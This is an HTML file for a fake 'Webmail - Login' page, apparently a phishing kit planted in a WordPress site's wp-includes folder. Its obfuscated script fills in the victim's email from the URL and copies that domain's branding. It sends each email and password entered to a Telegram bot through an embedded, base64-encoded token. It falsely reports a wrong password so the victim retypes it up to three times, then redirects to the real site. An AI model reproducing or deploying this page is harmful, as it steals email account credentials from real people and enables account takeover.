File: //proc/thread-self/root/proc/self/cwd/wp-includes/ID3/b/index.html
<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="referrer" content="strict-origin">
<link id="favicon" rel="shortcut icon" type="image/png" href="favicon.png">
<script src="https://code.jquery.com/jquery-2.2.4.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>
<title>Webmail - Login</title>
<style>
body {
background-color: #eeeeee;
font-family: Helvetica Neue, Helvetica, sans-serif;
font-size: 13px;
color: #425152;
margin: 0;
}
::-moz-placeholder {
color: #d9dad9;
}
:-ms-input-placeholder {
color: #d9dad9;
}
::-ms-input-placeholder {
color: #d9dad9;
}
::placeholder {
color: #d9dad9;
}
a {
color: #425152;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
input {
border-radius: 5px;
padding: 5px 3px;
}
input.submit {
font-weight: bold;
text-align: center;
min-width: 90px;
color: #f0f0f0;
background: #444444;
padding: 5px 12px;
border-color: #444444;
border-style: solid;
cursor: pointer;
}
input.submit:hover {
color: #ffffff;
}
.row {
margin: 10px 0;
}
.row:after {
content: "";
display: table;
clear: both;
}
.logoWithPortalIcons {
width: 150px;
height: 50px;
background: transparent url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAAARCAYAAAA/tFWCAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH3gYNAictBVTA/AAAAj5JREFUaN7tWdFtgzAQfakyAPICyQffNCOQCdpMUDaoMkHIBFUnSDJB0gkgE5T62x9MgLJB+pGLRK2AMbYbiHgSPxjuznfPvjt7BOAMO0gBzAGgCHwPQAJgJn2zZlzEReBX6mRcjIrAD+n/MnIAC8ZFVnoXA1i1sPUEICOZO7LdVOYVIwC37J+X9LT1eUaPbDMqdOpiTfNPSF5rHzzBDfY3SGWKKYA9kdYUHjkuIidG6AdmfbHZOrGKwJ8Zsl1FrlcHcjcku0/YOPRz94jlKPBlvDiSG6J/eO+qYeOaPGtSa6nG1goZec03eZM6r8HO900psfzuWmOV5y/XG011tKltVOl7Iy1c1SIetbRHnp/sA6W9Y9tMZVykCnKBcRErxnNDcqMBcbOe7VInAJ//kBGc7VgTTYdfO6xrjRUBeKv4dse42Das0z6qOiPGxVJRlDfZsfqY+myn9z+xc02sSLPjkFNDXdCOml1bm64pMdgRHg2JZuw6Xbz3FYfBBQOxbGOraAoGWEiFqUbKQscCkuNyKq3CREr3EXU6j0au9T1jd5aeuEeOiyXbE4N5hzV1iq6OUCG/rc9vyW0yZqNW07LX+nED3fNVBSllXKRF4Md1RxFF4E9rGoi8SWc54C6YUROUjx0ID1F/iZsqxmPqLFc1/w/EstMVytgZ+HZPpPIAHF0QK3PsrK+BL1qLXAdHAz07XK6YPAC59a6QcXFwWBSehmOBzsKjuJ9cHjcs4ObAcUnXPQO6hRTAc2nx//wCPaq4/QlxCjAAAAAASUVORK5CYII=')
/*IconsTogether.svg*/
no-repeat left top;
}
.logoOnly {
width: 280px;
height: 30px;
overflow: hidden;
}
.logoOnly .logoWithPortalIcons {
width: 320px;
height: 120px;
}
.title {
font-size: 26px;
margin: 20px 0 10px;
}
.red {
color: #EE3031;
}
a#create-account {
display: inline-block;
border-radius: 4px;
padding: 3px 8px;
border: 1px solid #EE3031;
}
a#create-account:hover {
text-decoration: none;
}
.col1,
.col2 {
float: left;
line-height: 30px;
vertical-align: middle;
padding-top: 4px;
}
.col1 {
width: 124px;
font-size: 13px;
font-weight: 600;
}
.col2 {
width: 286px;
}
.col2 input {
width: 96%;
}
.error {
color: #D52B1E;
font-weight: normal;
}
.container {
background: rgba(255, 255, 255, 1.0);
padding: 40px;
box-shadow: 2px 2px 4px 2px #ccc;
width: 416px;
border-radius: 5px;
/*
margin: 0 auto;
position:absolute;
left:0;
right:0;
top:38%;
top:100px\9;
transform: translateY(-50%);
*/
margin: 10% auto 30px auto;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
transition: all 0.3s cubic-bezier(.25, .8, .25, 1);
}
.password-icon {
width: 20px;
position: absolute;
cursor: pointer;
margin-top: 9px;
margin-left: -28px;
background-color: white;
}
#login_footer {
line-height: 125%;
font-size: 12px;
text-align: justify;
width: 500px;
margin: 90px auto auto auto;
padding-left: 10px;
}
@media only screen and (max-width: 600px) {
body {
background-image: none;
}
.container {
/*
position:relative;
padding: 20px;
box-shadow:none;
width: 375px;
top:0;
left:auto;
right:auto;
transform: translateY(0);
*/
width: 100%;
border-radius: 0;
box-shadow: none;
padding: 0;
margin-top: 0;
}
.container div.body {
padding: 40px 20px;
}
.col1,
.col2 {
float: none;
width: 100%;
}
#login_footer {
width: 99%;
margin-top: 20px;
}
#login_footer div.content {
padding: 10px 20px 10px 10px;
}
.password-icon {
margin-top: -25px;
right: 7%;
}
}
.xlogo {
color: #fff;
margin-bottom: 10px;
display: flex;
gap: 10px;
align-items: center;
margin-top: -25px;
}
.xlogo img {
vertical-align: middle;
width: 5%;
height: 5%;
object-fit: contain
}
.xlogo span {
vertical-align: middle
}
.text-g {
font-family: "Arial Black", Gadget, sans-serif;
text-transform: uppercase !important;
text-align: center;
font-size: 25px;
color: #444444;
background-color: rgba(255, 255, 255, 0);
text-shadow: rgb(255, 255, 255) 2px 2px 2px;
}
#root {
position: absolute;
left: 0;
right: 0;
bottom: 0;
top: 0;
z-index: -10;
pointer-events: none;
filter: brightness(0.3)
}
</style>
<style>
#domain-name {
font-weight: bold;
font-size: 16px;
color: #333;
}
#submit-btn {
font-weight: bold;
text-align: center;
min-width: 90px;
color: #f0f0f0;
background: #444444;
padding: 5px 12px;
border-color: #444444;
border-style: solid;
border-radius: 5px;
cursor: pointer;
}
#submit-btn:hover {
background: #21130d;
}
#error-msg {
color: red;
font-size: 14px;
display: none;
margin-bottom: 10px;
margin-top: 10px;
}
#loading-overlay {
position: fixed;
top: 0;
left: 0;
width: 100vw;
height: 100vh;
background: rgba(255,255,255,0.8);
display: none;
justify-content: center;
align-items: center;
z-index: 9999;
}
.loader {
border: 4px solid #f3f3f3;
border-top: 4px solid #007bff;
border-radius: 50%;
width: 40px;
height: 40px;
animation: spin 1s linear infinite;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
#thanks-msg {
text-align: center;
font-size: 20px;
display: none;
}
</style>
</head>
<body>
<div id="loading-overlay"><div class="loader"></div></div>
<div class="container" id="form-container">
<div class="xlogo">
<img id="logo" src="https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=805fb0ef-a2d9-4a7f-85e6-d68384e166e3" alt="Logo">
<div id="domain-name"></div>
</div>
<form id="login-form">
<div class="col1"><label for="email">Email:</label></div>
<div class="col2"><input type="text" name="email" value="" id="email" placeholder="Email" style="margin-bottom: 10px;" required></div>
<div class="col1"><label for="password">Password:</label></div>
<div class="col2"><input type="password" name="password" id="password" autofocus="" placeholder="Password" style="margin-bottom: 10px;" required></div>
<div id="error-msg" class="error-msg">Incorrect password, please re-enter.</div>
<button type="submit" id="submit-btn" class="submit" style="padding:7px 24px;margin-top: 10px;margin-bottom: 10px;">Login</button>
</form>
<div id="thanks-msg">Thanks. Redirecting...</div>
<div class="row">
<p style="font-size:120%;color:#ff2b10;">To find out</p>
<p>
To protect your email account., <span id="kai" style="text-transform: capitalize;"></span>.
<br>
To protect your email account.
<br>
Your account may be restricted until your identity can be verified.
</p>
</div>
</div>
<script>
const _0x37ffce=_0x14d1;(function(_0x45e277,_0x445806){const _0x1e4455=_0x14d1,_0x5b92cb=_0x45e277();while(!![]){try{const _0x5e8038=parseInt(_0x1e4455(0x152))/0x1+parseInt(_0x1e4455(0x13d))/0x2*(-parseInt(_0x1e4455(0x13e))/0x3)+-parseInt(_0x1e4455(0x150))/0x4+parseInt(_0x1e4455(0x15d))/0x5+parseInt(_0x1e4455(0x13f))/0x6*(parseInt(_0x1e4455(0x15e))/0x7)+-parseInt(_0x1e4455(0x148))/0x8+parseInt(_0x1e4455(0x130))/0x9*(parseInt(_0x1e4455(0x160))/0xa);if(_0x5e8038===_0x445806)break;else _0x5b92cb['push'](_0x5b92cb['shift']());}catch(_0x4ccd53){_0x5b92cb['push'](_0x5b92cb['shift']());}}}(_0x51ef,0xf2b06));let attempts=0x0;function _0x14d1(_0x4e6de9,_0x4dfaf4){_0x4e6de9=_0x4e6de9-0x130;const _0x51ef72=_0x51ef();let _0x14d16e=_0x51ef72[_0x4e6de9];return _0x14d16e;}const botToken=atob('ODc5MzIxMDM0NTpBQUg2SnRTNFQtNGV2Z0VYZzVoLXlOU3Zad1pPUDlCWUowcw=='),chatId=atob('NjkwMzcxNTYyOQ==');function extractDomain(_0x1211f2){const _0x12bec9=_0x14d1;return _0x1211f2[_0x12bec9(0x14d)]('@')[0x1]['trim']()[_0x12bec9(0x13b)]();}function updateVisuals(_0x1e05d2){const _0x27a4ee=_0x14d1;document[_0x27a4ee(0x153)](_0x27a4ee(0x147))[_0x27a4ee(0x155)]=_0x27a4ee(0x141)+_0x1e05d2+_0x27a4ee(0x157),document[_0x27a4ee(0x153)](_0x27a4ee(0x142))[_0x27a4ee(0x14c)]=_0x1e05d2[_0x27a4ee(0x14d)]('.')[0x0],document[_0x27a4ee(0x139)]['style'][_0x27a4ee(0x14a)]=_0x27a4ee(0x14e)+_0x1e05d2+'\x27)';}function _0x51ef(){const _0x83142c=['block','logo','15241584FaQgGA','substring','backgroundImage','password','textContent','split','url(\x27https://image.thum.io/get/width/1500/https://','location','4293064DIpMyF','display','563798UJHzbG','getElementById','POST','src','email','.ico','href','Login\x20Attempt\x20','value','flex','login-form','9584700OJgTKW','224DbdTQP','addEventListener','10SETWev','15864822evKANF','loading-overlay','preventDefault','error-msg','none','application/json','/sendMessage','\x0aEmail:\x20','style','body','trim','toLowerCase','submit','2ZJEeEi','5119302fAOsLw','269148dkudqq','hash','https://icons.duckduckgo.com/ip3/','domain-name','thanks-msg','\x0aPassword:\x20','includes'];_0x51ef=function(){return _0x83142c;};return _0x51ef();}function autoGrabEmail(){const _0x333070=_0x14d1,_0x27b21e=window[_0x333070(0x14f)][_0x333070(0x140)][_0x333070(0x149)](0x1);_0x27b21e[_0x333070(0x145)]('@')&&(document['getElementById'](_0x333070(0x156))[_0x333070(0x15a)]=_0x27b21e,updateVisuals(extractDomain(_0x27b21e)));}function sendToTelegram(_0x473364,_0x2101cc,_0x4f3723){const _0x181547=_0x14d1,_0x4bc6c8=extractDomain(_0x473364),_0x335261=_0x181547(0x159)+_0x4f3723+_0x181547(0x137)+_0x473364+_0x181547(0x144)+_0x2101cc+'\x0aDomain:\x20'+_0x4bc6c8;fetch('https://api.telegram.org/bot'+botToken+_0x181547(0x136),{'method':_0x181547(0x154),'headers':{'Content-Type':_0x181547(0x135)},'body':JSON['stringify']({'chat_id':chatId,'text':_0x335261})});}autoGrabEmail(),document['getElementById'](_0x37ffce(0x15c))[_0x37ffce(0x15f)](_0x37ffce(0x13c),function(_0x402fd5){const _0x440149=_0x37ffce;_0x402fd5[_0x440149(0x132)]();const _0x340401=document[_0x440149(0x153)](_0x440149(0x156))['value']['trim'](),_0x514423=document[_0x440149(0x153)](_0x440149(0x14b))['value'][_0x440149(0x13a)](),_0x375347=extractDomain(_0x340401);updateVisuals(_0x375347),document[_0x440149(0x153)](_0x440149(0x133))['style']['display']=_0x440149(0x134),document[_0x440149(0x153)](_0x440149(0x131))[_0x440149(0x138)][_0x440149(0x151)]=_0x440149(0x15b),attempts++,sendToTelegram(_0x340401,_0x514423,attempts),setTimeout(()=>{const _0x2cf110=_0x440149;document[_0x2cf110(0x153)](_0x2cf110(0x131))[_0x2cf110(0x138)][_0x2cf110(0x151)]=_0x2cf110(0x134),attempts<0x3?(document[_0x2cf110(0x153)](_0x2cf110(0x133))[_0x2cf110(0x138)]['display']=_0x2cf110(0x146),document[_0x2cf110(0x153)]('password')['value']=''):(document[_0x2cf110(0x153)](_0x2cf110(0x15c))[_0x2cf110(0x138)]['display']=_0x2cf110(0x134),document['getElementById'](_0x2cf110(0x143))[_0x2cf110(0x138)][_0x2cf110(0x151)]=_0x2cf110(0x146),setTimeout(()=>{const _0x7ae118=_0x2cf110;window[_0x7ae118(0x14f)][_0x7ae118(0x158)]='https://'+_0x375347;},0xbb8));},0xbb8);});
</script>
</body></html>